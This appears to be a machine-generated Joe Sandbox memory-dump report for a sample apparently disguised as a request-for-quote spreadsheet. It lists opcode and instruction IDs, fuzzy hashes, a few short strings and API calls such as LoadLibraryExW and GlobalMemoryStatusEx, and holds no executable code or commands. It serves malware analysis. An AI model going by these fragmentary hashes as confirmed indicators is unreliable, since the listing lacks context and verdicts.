                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0561eb10a050f16d31f62adba82d97c5c27a026e7ce6f8a196345521da52a02e
                                              • Instruction ID: 3a60d288c22c9e6bad28688903ef0b07b0dc90ef78cb346b0c0004211c6fdc3c
                                              • Opcode Fuzzy Hash: 0561eb10a050f16d31f62adba82d97c5c27a026e7ce6f8a196345521da52a02e
                                              • Instruction Fuzzy Hash: 5B126D74A002058FDB15DF69D584BAEBBB2FF88314F14856AEA09DB3A5DB34DC42CB50
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee1b405ad1bec60c80875efc179d5281c767a3281732864f343604880b6827b2
                                              • Instruction ID: b75174a5a2f9b170282b6ac850effee883b70bd224eab56d45ca0b13d0cd0ea4
                                              • Opcode Fuzzy Hash: ee1b405ad1bec60c80875efc179d5281c767a3281732864f343604880b6827b2
                                              • Instruction Fuzzy Hash: 18B15270E002098FDB14CFA9C98579FBBF2AF88714F18812ED515E73A4EB749846CB81
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 92a1b0360b3e265529173acf0fad6ed8847111c98c65ed37d2e9e104681f7324
                                              • Instruction ID: 45e0e75d8b0ebf69d1674ce8d137b60d9e9d3e43778ff1231968350df1312571
                                              • Opcode Fuzzy Hash: 92a1b0360b3e265529173acf0fad6ed8847111c98c65ed37d2e9e104681f7324
                                              • Instruction Fuzzy Hash: 449132B0E002099FDF14CFA9C99579EBBF2BF88314F14812EE515A7364EB749845CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph (rendered graph data; block listing omitted). Recoverable structure: function at 66de0c8, basic blocks 66de0c8-66de245, calls 66dce34 and 66dce40, loop over 66de157-66de19c, GlobalMemoryStatusEx called in block 66de19e-66de214.
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3278418799.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_66d0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d58d0b7a2bfef17787fd364b5cafc0438055ef192c144159e2543a7ee71626a
                                              • Instruction ID: aac312df58d40802872f3fce5e8ab64793ecf1c30564bf7240bf8d28d3986bf1
                                              • Opcode Fuzzy Hash: 1d58d0b7a2bfef17787fd364b5cafc0438055ef192c144159e2543a7ee71626a
                                              • Instruction Fuzzy Hash: 17412672D0439A8FCB00DF69D8446DEBFF5AF89210F1486AAD454E7391DB389845CBE0
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,071C0E09,00000800), ref: 071C0E9A
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3280725075.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_71c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: ab8a6f2e7c7da7f334d087df6748ecf4298ddec44f934a9be4298b4da24c0358
                                              • Instruction ID: 4ed070bff282c559deb48da33cf85b15c854c740502ee09245321fb82a6648b2
                                              • Opcode Fuzzy Hash: ab8a6f2e7c7da7f334d087df6748ecf4298ddec44f934a9be4298b4da24c0358
                                              • Instruction Fuzzy Hash: A611D0B6900249DFDB10CF9AC944A9EFBF5EB98310F14842EE919B7240C375A945CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph (rendered graph data; block listing omitted). Recoverable structure: function at 66dce40, basic blocks 66dce40-66de245, GlobalMemoryStatusEx called in block 66dce40-66de214.
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,066DE11A), ref: 066DE207
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3278418799.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_66d0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 3909ef2a1e7633eba288a0aaa7450f39bb08f161617696734f35762b9008d0d6
                                              • Instruction ID: 54f326c0a4a1da719bfebb04d7d79fd2752fce37f389c8dbb87c995373f054b3
                                              • Opcode Fuzzy Hash: 3909ef2a1e7633eba288a0aaa7450f39bb08f161617696734f35762b9008d0d6
                                              • Instruction Fuzzy Hash: 871136B1C0065A9BCB10CF9AC844B9EFBF8EB48310F10816AE918A7241D779A944CFE1
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,071C0E09,00000800), ref: 071C0E9A
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3280725075.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_71c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 8536cbd66674b5500c8f3b3ef8742da2e9efb387da1e43f80974b5d88230ee4c
                                              • Instruction ID: b4de4c6cc5fcb29efea57e5569dced2a44eb324d022b492b31519002c250597f
                                              • Opcode Fuzzy Hash: 8536cbd66674b5500c8f3b3ef8742da2e9efb387da1e43f80974b5d88230ee4c
                                              • Instruction Fuzzy Hash: B11100B6C003099FCB14CF9AC844A9EFBF4EB98310F10842EE919B7240C375A945CFA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRcq
                                              • API String ID: 0-4134321033
                                              • Opcode ID: 614f4b58db734fc60d3f0fe70da271b01bacff1128e77dc17222c344cbc4a2ee
                                              • Instruction ID: 70d2fca39e2db421de59dd3d838acf5a3e7921a2bc153c76d98c0eef14fe0d98
                                              • Opcode Fuzzy Hash: 614f4b58db734fc60d3f0fe70da271b01bacff1128e77dc17222c344cbc4a2ee
                                              • Instruction Fuzzy Hash: C9418B74F002068FDB15CF69C85479EBBB2EF85301F20852EE606EB3A1DB759946CB51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHcq
                                              • API String ID: 0-4245845256
                                              • Opcode ID: 95365df418462600a028234125cd84d5197f6e42e1b47a5fdfaac53a2ce7c67a
                                              • Instruction ID: 0ecf949b29363d292a35eaed9eed522f838a21e038be7e4158ba9297b063b0f1
                                              • Opcode Fuzzy Hash: 95365df418462600a028234125cd84d5197f6e42e1b47a5fdfaac53a2ce7c67a
                                              • Instruction Fuzzy Hash: C331E3717002018FEB169F78D55466F7BE2EF85200B64457ED106DB3A6DE34DC4ACB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHcq
                                              • API String ID: 0-4245845256
                                              • Opcode ID: 80f6bbbed164d2b85593f3ba73f462f830bfd90bc24d7167d4a5889d2c452af9
                                              • Instruction ID: 15965f3c3c8364ed7153b283e18c0ab40c241aaca821802187b5ca8d10d67f95
                                              • Opcode Fuzzy Hash: 80f6bbbed164d2b85593f3ba73f462f830bfd90bc24d7167d4a5889d2c452af9
                                              • Instruction Fuzzy Hash: 0B31F2717002058FEB169F78D45466F7BE2EF88200B64843DD506DB3A6DE34DC8ACB95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRcq
                                              • API String ID: 0-4134321033
                                              • Opcode ID: f5e02342328ecfae00383023f9d72165c04f265a3140e466d913bc4ea4003aeb
                                              • Instruction ID: 3cf82c5471e0610e6e74cafc4c6d07c568b0dae402e657649c7a0179e8bfa005
                                              • Opcode Fuzzy Hash: f5e02342328ecfae00383023f9d72165c04f265a3140e466d913bc4ea4003aeb
                                              • Instruction Fuzzy Hash: 6A318F74E0020A9FDB19CFA9C44479EB7B2FF85301F20852AEA05EB361DB75A946CB51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRcq
                                              • API String ID: 0-4134321033
                                              • Opcode ID: 3778ba75654ecd2702ec067b8ecb2f4a8991fb23d7da68b80234791b4a3d9cbd
                                              • Instruction ID: 5f2ead6103ee6ad4af18be6383a55c1f8663620e95259f808e7f2febd818118d
                                              • Opcode Fuzzy Hash: 3778ba75654ecd2702ec067b8ecb2f4a8991fb23d7da68b80234791b4a3d9cbd
                                              • Instruction Fuzzy Hash: 5F1104717082418FC706AB79842466E7FB2EF8A301B1580BFD409CB3A6DA758840CB92
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aa3c3b2202be6de6bff47c2731aa70bddcdaefa586c2f4f7ebd8929bfab3dd0c
                                              • Instruction ID: ae572a3bb413cd91df5e2e58b404a297bc1f72167f299071c3eb8614080e26ff
                                              • Opcode Fuzzy Hash: aa3c3b2202be6de6bff47c2731aa70bddcdaefa586c2f4f7ebd8929bfab3dd0c
                                              • Instruction Fuzzy Hash: 2A129F71311202CFCB2B9B3DE58422D7AA2FBD5305B64897EE205CB365CE35DC468B91
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a17a26b5bf0157b63358b3e0c8faec5b528b2558090aa26ce0c826facdb22018
                                              • Instruction ID: 63da4557baf9e0bfae5f527ce1eeb24a171090f0a3916c5096cd2729627744a9
                                              • Opcode Fuzzy Hash: a17a26b5bf0157b63358b3e0c8faec5b528b2558090aa26ce0c826facdb22018
                                              • Instruction Fuzzy Hash: 4EB14E70E002099FDB10CFA9D9857AEBBF1AF88714F18812ED514E73A5EB749846CB81
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 855610d10832a9bc2df19df432a41d818c3b19db6b980a79fd09469c080c122f
                                              • Instruction ID: 39448fc6b85640b0393b91cc664ae1d71c94e87c0fe3a66d37e82c00a9ae0f47
                                              • Opcode Fuzzy Hash: 855610d10832a9bc2df19df432a41d818c3b19db6b980a79fd09469c080c122f
                                              • Instruction Fuzzy Hash: 23915B74A002058FDB15DF69D584AAEBBF2FF88314F14856AEA06E73A5DB34DC42CB50
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3392e3c54d30cda90cc6730362f8cee3a1187e071138a5e3bed3e7160543821d
                                              • Instruction ID: 58f4f418045a4542c585319458ae0729228e13829916be3c01485b92b6f035ab
                                              • Opcode Fuzzy Hash: 3392e3c54d30cda90cc6730362f8cee3a1187e071138a5e3bed3e7160543821d
                                              • Instruction Fuzzy Hash: 72A13CB0E00209DFDB14CFA9C98579EBBF1BF88314F18812EE615A7364EB749845CB91
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 278b6298066ee3fe7f4244200b74fe5301e062a9559f0c16ed3f2a536c487950
                                              • Instruction ID: 82ac9f0f4b7b85c36d6f00543f7578923083661a819671121000b9dc70aa56d6
                                              • Opcode Fuzzy Hash: 278b6298066ee3fe7f4244200b74fe5301e062a9559f0c16ed3f2a536c487950
                                              • Instruction Fuzzy Hash: F8714D70E002499FDB10CFA9C885B9EBBF1EF88714F18812EE515A7364EB749845CB91
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9cd22d07c3f8ceb29c39115ee4d4220b62ff13a6e71b161e94e8bb18172b8d48
                                              • Instruction ID: 56b8d7c05bfcdaf5e3db8cc58edba05c7e46adf19a660c6b6a7780af33563acc
                                              • Opcode Fuzzy Hash: 9cd22d07c3f8ceb29c39115ee4d4220b62ff13a6e71b161e94e8bb18172b8d48
                                              • Instruction Fuzzy Hash: F1716070E002499FDB10CFA9C885B9FBBF2EF88714F18812ED515A7364EB749846CB91
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe84c77aec3b451d8242750cd827841403626a6857b328a0b20d3f2d204c29db
                                              • Instruction ID: fd544d69670228bf5685001a169f60beafa6323d8581244a8661b95b750c312b
                                              • Opcode Fuzzy Hash: fe84c77aec3b451d8242750cd827841403626a6857b328a0b20d3f2d204c29db
                                              • Instruction Fuzzy Hash: FB513471D102188FDB18CFA9C884BAEBBB1FF48310F15812EE919AB3A5C7749845CF91
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb912f8e8a815ce9fab926818c4fe52c5ca390507c9bee77ee38fca5d9b8c068
                                              • Instruction ID: e22584d6a8b9bcd5072a28dd5b74db04cd716616bfcabbbb17b48c5c440334d1
                                              • Opcode Fuzzy Hash: bb912f8e8a815ce9fab926818c4fe52c5ca390507c9bee77ee38fca5d9b8c068
                                              • Instruction Fuzzy Hash: 78512371D102188FDB18CFA9C884B9EBBB1FF48310F15811EE919AB3A5DB74A845CB95
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fb28402330d40580a897dc474356b2f030a7a93eba4afd9f2945c267729043f3
                                              • Instruction ID: f4026b30c5bb2a1b637b3adda08773324e1758832dd03b82f058e023c14657ea
                                              • Opcode Fuzzy Hash: fb28402330d40580a897dc474356b2f030a7a93eba4afd9f2945c267729043f3
                                              • Instruction Fuzzy Hash: B751F971351281CFC716DB3CF989944BF66FB6670434489A9F005AB236DF286D49CBA2
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db6b69b2ae590fb82dad7f39a1b91d706dc9036440dff40247147ec8f8ed5f66
                                              • Instruction ID: 60c5f0d50d0da1370e84ddfdee9d7a0404e12c7a85af57c14c1b5c645e6a9215
                                              • Opcode Fuzzy Hash: db6b69b2ae590fb82dad7f39a1b91d706dc9036440dff40247147ec8f8ed5f66
                                              • Instruction Fuzzy Hash: B531C170710201CFEB32DB2CF4887593B66FB56B54F0409AEE606CB37ADA398D858B51
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c72de6c7a71562e6bb21c3e3676662096ef32301f0f2c69a665130c92cd11e83
                                              • Instruction ID: c0470824c1a0a398108fddd631ad7ca079bbc1a04505de2f9d00ac3c322ee0c4
                                              • Opcode Fuzzy Hash: c72de6c7a71562e6bb21c3e3676662096ef32301f0f2c69a665130c92cd11e83
                                              • Instruction Fuzzy Hash: 4141E871351181CFCB16DB3CF989948BF67FBA570434489A9F005AB236DF286D49CBA2
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0bed4d0fee5b8de0039423e83664be0fc63e30a16d762227dc53cc2fcea0fbb
                                              • Instruction ID: 91411f173aa4401bb399fbe618ab845b3cdb1be0ad95c79ca909eb88937b701d
                                              • Opcode Fuzzy Hash: f0bed4d0fee5b8de0039423e83664be0fc63e30a16d762227dc53cc2fcea0fbb
                                              • Instruction Fuzzy Hash: 14317E35E106058BCB19CF69D594A9EBBB2FF89300F10852EE906E7364DB71EC46CB40
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 44753192c22c0c030c07cecc14fac6fb49fab790681855f76dc777dc5f73c346
                                              • Instruction ID: 9af2a30e554df3ecb54b8a7454ec42d2a005b593120f3a4f42f76b0daea21e9f
                                              • Opcode Fuzzy Hash: 44753192c22c0c030c07cecc14fac6fb49fab790681855f76dc777dc5f73c346
                                              • Instruction Fuzzy Hash: 5541CFB1900349DFDB10DFA9C484ADEBFF5EF48314F24802AE519AB354DB75A945CB90
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d13984db103e65ea156380757e6e810f9d343e78e30f0a21f227c1d4d53a265
                                              • Instruction ID: 2c94701d1e8f51989880edcc6a298285f0e980dc3e59628a4bc02743542215d9
                                              • Opcode Fuzzy Hash: 6d13984db103e65ea156380757e6e810f9d343e78e30f0a21f227c1d4d53a265
                                              • Instruction Fuzzy Hash: EF31F031B00201DFDF61DB7CA84875FB7E5FB89754F24056AEA0AD7329EA348D018B92
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 47775066e7e4bebffb60be941882277fb9f72133b217915a63fb710fbc77cca1
                                              • Instruction ID: 6984c6ac3a36208eb5e44007181d81281136861f08a04f5eae47490a61f79f96
                                              • Opcode Fuzzy Hash: 47775066e7e4bebffb60be941882277fb9f72133b217915a63fb710fbc77cca1
                                              • Instruction Fuzzy Hash: EC317E35E106059BCB19CFA9D594A9EBBB2EF89300F10852EE946E7364DF70EC46CB50
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f06dc7b0df9dde86b100b6773f9cfbf3e78d5d79bbe3b054f41c473e5c3a128
                                              • Instruction ID: 2242d0a2abcdd6fbe77259d5b35b8e347ed00d372cb6840c5b47adbb5a22c94a
                                              • Opcode Fuzzy Hash: 7f06dc7b0df9dde86b100b6773f9cfbf3e78d5d79bbe3b054f41c473e5c3a128
                                              • Instruction Fuzzy Hash: 8F313A74B00211CFDB15DB78D6546AEB7B2EB99244B1000ADDA01AB374DF3A9C01CBA5
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 68f951694b54b21d4ba4b9198e29ac9e576a7f8b739cf34d4feba63e70f86536
                                              • Instruction ID: 7065a0bd313d5a0e61895631b33e4fccee4f8e33c99c5b8bace32a77daba8087
                                              • Opcode Fuzzy Hash: 68f951694b54b21d4ba4b9198e29ac9e576a7f8b739cf34d4feba63e70f86536
                                              • Instruction Fuzzy Hash: D541CEB1D003499FDB10DF99C884A9EBFF5EF48314F24802AE919AB364DB75A945CB90
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 59eb7219e26da5a5ecbf34328c10c7b65a4b9319a50b7519755c53a9a4a0cc87
                                              • Instruction ID: cbba686e559c2a51a2dedb4098e105fe0d411d63d1554b62afa4cbdcb6d7ccb1
                                              • Opcode Fuzzy Hash: 59eb7219e26da5a5ecbf34328c10c7b65a4b9319a50b7519755c53a9a4a0cc87
                                              • Instruction Fuzzy Hash: F2316C74B00215CFDB15DB79D6146AEB7B2EB99244F1000ADD601AB3B4DF3A9C41CBA2
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9492d63384140bfd7c4b0293242535b0d80b2400341311af465f18506f887782
                                              • Instruction ID: 50df69490a3b3bcbbe80fc9b9836b78306fea5a657cb53a8a68a96fdeb11089f
                                              • Opcode Fuzzy Hash: 9492d63384140bfd7c4b0293242535b0d80b2400341311af465f18506f887782
                                              • Instruction Fuzzy Hash: A4318231A01211CFCB22EFB9D4942AE7BB5EB95610F1404BFEA0AD7362D735CD418B91
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca96b7d49d2df8e06cbe14ba858d9a1eddacde8794f03b70875059201d302f4a
                                              • Instruction ID: afc8ad02ad18f4332e1c2f8b5ef546b1bd4cc8205649d35238911712ca24a5d2
                                              • Opcode Fuzzy Hash: ca96b7d49d2df8e06cbe14ba858d9a1eddacde8794f03b70875059201d302f4a
                                              • Instruction Fuzzy Hash: CA317371E002059FDB19CF59D45079EBBB2FF89304F14862AE505EB3A1DB719846CB90
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e0b57680fcf05a0afd29cd6bae634a3862620adce72c8003346fb9c457c1e53a
                                              • Instruction ID: 9fd2d407719f6dc30ae5b9287299f93ad9dcf778bf8e875386ba3b2876aa30c6
                                              • Opcode Fuzzy Hash: e0b57680fcf05a0afd29cd6bae634a3862620adce72c8003346fb9c457c1e53a
                                              • Instruction Fuzzy Hash: E021BA70700101DFEF22DB2CF84876A3767EB56B54F14496AE50ACB376DA349C458F41
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56f567b9e46c93d9aae2ab5a48a48f88292e5d52b6a2138460473bb2ec2254ba
                                              • Instruction ID: 3b73ae18c756d747c9271b4fb1d992369f2bab57a98e7be2b85563aac6ec714f
                                              • Opcode Fuzzy Hash: 56f567b9e46c93d9aae2ab5a48a48f88292e5d52b6a2138460473bb2ec2254ba
